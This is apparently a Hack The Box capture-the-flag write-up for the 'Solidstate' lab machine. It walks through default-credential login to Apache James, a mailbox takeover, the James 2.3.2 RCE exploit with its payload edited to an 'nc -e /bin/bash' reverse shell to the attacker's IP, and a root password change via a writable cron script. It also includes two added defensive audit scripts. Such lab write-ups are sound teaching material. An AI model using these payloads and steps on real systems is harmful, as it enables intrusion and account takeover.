Hack The Box - Solidstate




Summary


This machine contained a fairly straightforward SMTP vulnerability which didn’t even need to be exploited to fully compromise the machine. It is an essential machine to understand for anyone wanting to sit the current OSCP exam due to the elements contained within it.

Gaining Access

  • Locate James Remote Administration Tool and login
  • Reset email credentials
  • Locate SSH credentials in Mindy’s email
  • Exploit Apache James Server 2.3.2 RCE
  • SSH in as Mindy

Elevating Privileges

  • Locate tmp.py file
  • Use scheduled task to modify root password
  • Login as root user

Write-up


First off I enumerated open ports.

root@mintsec:~/Desktop/machines/Solidstate# nmap -sC -sV -oA nmap 10.10.10.51
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
|   2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
|   256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_  256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (EdDSA)
25/tcp  open  smtp    JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (10.10.12.121 [10.10.12.121]),
80/tcp  open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Home - Solid State Security
110/tcp open  pop3    JAMES pop3d 2.3.2
119/tcp open  nntp    JAMES nntpd (posting ok)
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel

This highlighted an SMTP server which was running, and a website which was of interest. Looking at the website revealed nothing more than a contact form, and a brief attempt at enumerating directories led nowhere.

Screenshot: the Solid State Security website home page.

Wanting to ensure I covered off all bases I ran a full nmap scan to see if there was anything I’d missed.

root@mintsec:~/Desktop/machines/Solidstate# nmap -p- -T5 -oA nmapfull 10.10.10.51
PORT     STATE SERVICE
22/tcp   open  ssh
25/tcp   open  smtp
80/tcp   open  http
110/tcp  open  pop3
119/tcp  open  nntp
4555/tcp open  rsip

Locate James Remote Administration Tool and login

4555/tcp open rsip

This revealed an open port which nmap thought was rsip. In the context of other services this seemed unusual, so I connected to it with netcat.

root@mintsec:~/Desktop/machines/Solidstate# nc 10.10.10.51 4555
JAMES Remote Administration Tool 2.3.2
Please enter your login and password

Interesting: it was instead a remote admin service. From here, manually attempting some common username and password combinations revealed some usable credentials.

root
root

Reset email credentials

Looking further into what ‘JAMES’ was, I found it stood for the Java Apache Mail Enterprise Server, and as it turns out the credentials I’d guessed were also the default credentials used for the JAMES Remote Administration Tool. Poor form.

Looking at the available commands on this service, I utilised the “listusers” function to determine who had an email account.

listusers
user: james
user: thomas
user: john
user: mindy
user: mailadmin

From here I was able to reset the password of any of these users. By resetting Mindy’s password I was then able to view their emails from within Thunderbird.

setpassword mindy mindypassword
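The weakness above is a remote admin service left on its shipped default account. As an added example (not code from the write-up or from the James project), here is a small audit that parses an Apache James 2.3.x-style config.xml and flags a remotemanager that is enabled with the root/root default; the <remotemanager>/<handler>/<administrator_accounts>/<account> layout and the login/password attribute names are assumptions about the file format, and the sample fragment is constructed.

```python
# Added example: audit a James 2.3.x-style config.xml for the Remote
# Administration Tool defaults. The element layout is an assumption about
# the config format; the root/root default comes from the write-up.
import xml.etree.ElementTree as ET

DEFAULT_ADMIN = ("root", "root")
MIN_ADMIN_PASSWORD_LEN = 12  # example policy threshold, not a James setting

# Constructed sample resembling a default remotemanager block.
SAMPLE_CONFIG = """<config>
  <remotemanager enabled="true">
    <port>4555</port>
    <handler>
      <administrator_accounts>
        <account login="root" password="root"/>
      </administrator_accounts>
    </handler>
  </remotemanager>
</config>"""


def audit_remotemanager(xml_text):
    """Return a list of finding strings for the remote admin service."""
    findings = []
    root = ET.fromstring(xml_text)
    for rm in root.iter("remotemanager"):
        if rm.get("enabled", "false").lower() != "true":
            continue  # disabled service is not reachable; nothing to flag
        port = (rm.findtext("port") or "unknown").strip()
        for acct in rm.iter("account"):
            login = acct.get("login", "")
            password = acct.get("password", "")
            if (login, password) == DEFAULT_ADMIN:
                findings.append(
                    "remotemanager on port %s still uses the default admin "
                    "credentials %s/%s" % (port, login, password))
            elif len(password) < MIN_ADMIN_PASSWORD_LEN:
                findings.append(
                    "remotemanager admin '%s' has a short password (%d chars)"
                    % (login, len(password)))
    return findings


if __name__ == "__main__":
    for finding in audit_remotemanager(SAMPLE_CONFIG):
        print("FINDING:", finding)
```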

Locate SSH credentials in Mindy’s email

By opening Thunderbird and setting up a new account using the email [email protected], I was able to view Mindy’s emails. Thunderbird resembled the below configuration.

Your name: mindy
Email address: [email protected]
Password: mindypassword

Contained within this email were the SSH credentials for mindy.

Screenshot: the email containing Mindy’s SSH credentials.

  • mindy
  • P@55W0rd1!2@

Exploit Apache James Server 2.3.2 RCE

Of interest was that the email stated access was restricted. Upon logging in through SSH, I found I had a restricted bash (rbash) shell with limited capabilities.

ssh mindy@10.10.10.51
P@55W0rd1!2@
cd

-rbash: cd: restricted

To bypass this I had to search for and exploit a vulnerability in the JAMES software itself. First I had to find an appropriate payload.

root@mintsec:~/Desktop/machines/Solidstate# searchsploit "james"
--------------------------------------- ----------------------------------------
 Exploit Title                         |  Path
                                       | (/usr/share/exploitdb/)
--------------------------------------- ----------------------------------------
Apache James Server 2.2 - SMTP Denial  | exploits/multiple/dos/27915.pl
Apache James Server 2.3.2 - Remote Com | exploits/linux/remote/35513.py
WheresJames Webcam Publisher Beta 2.0. | exploits/windows/remote/944.c
--------------------------------------- ----------------------------------------

Using the -m (mirror) parameter I was able to copy the RCE exploit I had found into my working directory.

searchsploit -m 35513.py

Viewing this gave some context as to how the exploit works.

root@mintsec:~/Desktop/machines# cat 35513.py 
#!/usr/bin/python
#
# Exploit Title: Apache James Server 2.3.2 Authenticated User Remote Command Execution
# Date: 16\10\2014
# Exploit Author: Jakub Palaczynski, Marcin Woloszyn, Maciej Grabiec
# Vendor Homepage: http://james.apache.org/server/
# Software Link: http://ftp.ps.pl/pub/apache/james/server/apache-james-2.3.2.zip
# Version: Apache James Server 2.3.2
# Tested on: Ubuntu, Debian
# Info: This exploit works on default installation of Apache James Server 2.3.2
# Info: Example paths that will automatically execute payload on some action: /etc/bash_completion.d , /etc/pm/config.d

import socket
import sys
import time

# specify payload
#payload = 'touch /tmp/proof.txt' # to exploit on any user 
payload = '[ "$(id -u)" == "0" ] && touch /root/proof.txt' # to exploit only on root
# credentials to James Remote Administration Tool (Default - root/root)
user = 'root'
pwd = 'root'

From here I was able to modify the payload to connect back to my machine by changing the payload parameter.

# specify payload
#payload = 'touch /tmp/proof.txt' # to exploit on any user 
payload = 'nc -e /bin/bash 10.10.12.121 8080' # reverse shell back to my listener on port 8080
# credentials to James Remote Administration Tool (Default - root/root)
user = 'root'
pwd = 'root'

At this point I just needed to set up a listener, run the exploit, and then SSH into the machine to trigger the payload.

Set up a listener:

nc -nlvp 8080

Run the exploit:

python 35513.py 10.10.10.51

SSH into the machine:

ssh mindy@10.10.10.51
P@55W0rd1!2@

Success: I had a way of getting an unrestricted shell which provided access to this machine. One last thing I wanted to do was upgrade this to a fully (well, mostly) interactive TTY shell. Methods to do this are outlined on Ropnop’s Blog.

python -c 'import pty; pty.spawn("/bin/bash")'
${debian_chroot:+($debian_chroot)}mindy@solidstate:/home$

Interactive shell, including access to the user.txt file.

Gaining Access


User.txt: 914d0…6fd75


Locate tmp.py file

Looking into the /opt directory I located a tmp.py file which was owned by root, but writeable by everyone. A useful one-liner to help find files like this is shown below:

find / -user root -writable -type f -not -path "/proc/*"  2>/dev/null

Viewing this file gave some context as to what it was used for.

cat /opt/tmp.py
#!/usr/bin/env python
import os
import sys
try:
     os.system('rm -r /tmp/*')
except:
     sys.exit()

Use scheduled task to modify root password

Based on this I could infer it was used to remove anything placed in the temporary directory. Given this was owned by root, it was quite possible it would execute on a cron schedule and could serve as a privesc vector. I modified the Python script to change the root password to ‘JPMinty’ as shown below.

#!/usr/bin/env python
import os
import sys
os.system('echo root:JPMinty | /usr/sbin/chpasswd')
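The root cause here, for both the find one-liner above and the cron-driven privesc, is a root-owned script that unprivileged users can alter. As an added example (not from the write-up), this audit takes the paths a root cron job would execute and reports the permission problems that would let a low-privileged user hijack them; the temporary directory and the tmp.py/safe.py files in demo() are constructed for the demonstration.

```python
# Added example: flag cron-executed scripts an unprivileged user could alter.
# The directory layout built in demo() is constructed, modelled on /opt/tmp.py.
import os
import stat
import tempfile


def insecure_cron_scripts(paths):
    """Return (path, reason) for each script a low-privileged user could change."""
    findings = []
    for p in paths:
        try:
            st = os.lstat(p)
        except OSError:
            continue  # missing or unreadable: nothing to assess here
        mode = st.st_mode
        if stat.S_ISLNK(mode):
            findings.append((p, "symlink; target may be user-controlled"))
            continue
        if mode & stat.S_IWOTH:
            findings.append((p, "world-writable (mode %o)" % stat.S_IMODE(mode)))
        elif mode & stat.S_IWGRP and st.st_gid != 0:
            findings.append((p, "group-writable by gid %d" % st.st_gid))
        # A world-writable parent without the sticky bit lets anyone replace the file.
        parent = os.path.dirname(p) or "."
        pst = os.stat(parent)
        if pst.st_mode & stat.S_IWOTH and not pst.st_mode & stat.S_ISVTX:
            findings.append((p, "parent directory %s is world-writable" % parent))
    return findings


def demo():
    """Build a constructed /opt-like layout and audit it."""
    d = tempfile.mkdtemp()  # created 0700, so the parent-directory check stays quiet
    bad = os.path.join(d, "tmp.py")   # mirrors the box's world-writable /opt/tmp.py
    good = os.path.join(d, "safe.py")
    for path, mode in ((bad, 0o777), (good, 0o755)):
        with open(path, "w") as fh:
            fh.write("#!/usr/bin/env python\n")
        os.chmod(path, mode)
    return insecure_cron_scripts([bad, good, os.path.join(d, "missing.py")])


if __name__ == "__main__":
    for path, reason in demo():
        print("FINDING: %s: %s" % (path, reason))
```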

Login as root user

At this point I was able to use ‘su’ to elevate to root privileges.

su
JPMinty

And with that I’d fully compromised the system.

Elevating Privileges


root.txt: b4c97…c87c9


Final Notes

At the time of revising this, the machine did not have a rating matrix available. Feel free to reach out and provide any feedback or let me know if this helped.